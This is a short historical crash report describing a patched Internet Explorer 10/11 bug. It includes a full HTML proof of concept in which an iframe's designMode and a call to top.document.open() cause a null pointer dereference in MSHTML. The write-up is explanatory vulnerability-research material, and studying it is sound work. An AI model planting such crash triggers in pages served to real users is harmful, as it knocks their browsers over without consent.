A brief crash report. Enabling designMode in an iframe and then calling top.document.open() from script running inside that iframe caused a null pointer dereference in MSHTML!CJScript9Holder::ClearHostObjects. The proof of concept below is the whole trigger: a same-origin iframe, a script injected into it with execScript, and two statements in the right order.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Pin the document mode; the crash was observed under IE10 emulation and on IE11 -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
<title>DoS_designMode_documentOpen</title>
</head>
<!-- main() must actually be invoked; run it once the iframe exists -->
<body onload="main()">
<!-- Same-origin (about:blank) child frame; its window is reachable as window[0] -->
<iframe width="10" height="10"></iframe>
<script language="JavaScript">
function main()
{
    // Script executed inside the iframe's own JScript9 context.
    // parent is the top-level window here (single frame level), so
    // myTop.document.open() is the same as top.document.open().
    var iFrameCode = 'myTop = parent;' +
        // 1. Turn the iframe document into an editing host
        'document.designMode = "On";' +
        // Pause so the crash can be attached to a debugger before it fires
        'myTop.alert("Click OK to crash the browser");' +
        // 2. Open the parent document's stream, which tears down the parent
        //    (and this iframe) while designMode is still active
        'myTop.document.open();';
    // IE-specific: evaluate the code in the child frame's global scope
    window[0].execScript(iFrameCode);
}
</script>
</body>
</html>
The crash was classified as PROBABLY_NOT_EXPLOITABLE: a null-class pointer read at CJScript9Holder::ClearHostObjects+0x51, with no attacker control over the dereferenced address. The sequence matters: document.open() on the top-level document replaces that document, which destroys the iframe and the script context it is executing in; because the iframe was still an active designMode editing host, the JScript9 host objects were left in an invalid state during that teardown, and clearing them hit the null pointer. The crash reproduced on both IE10 and IE11.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.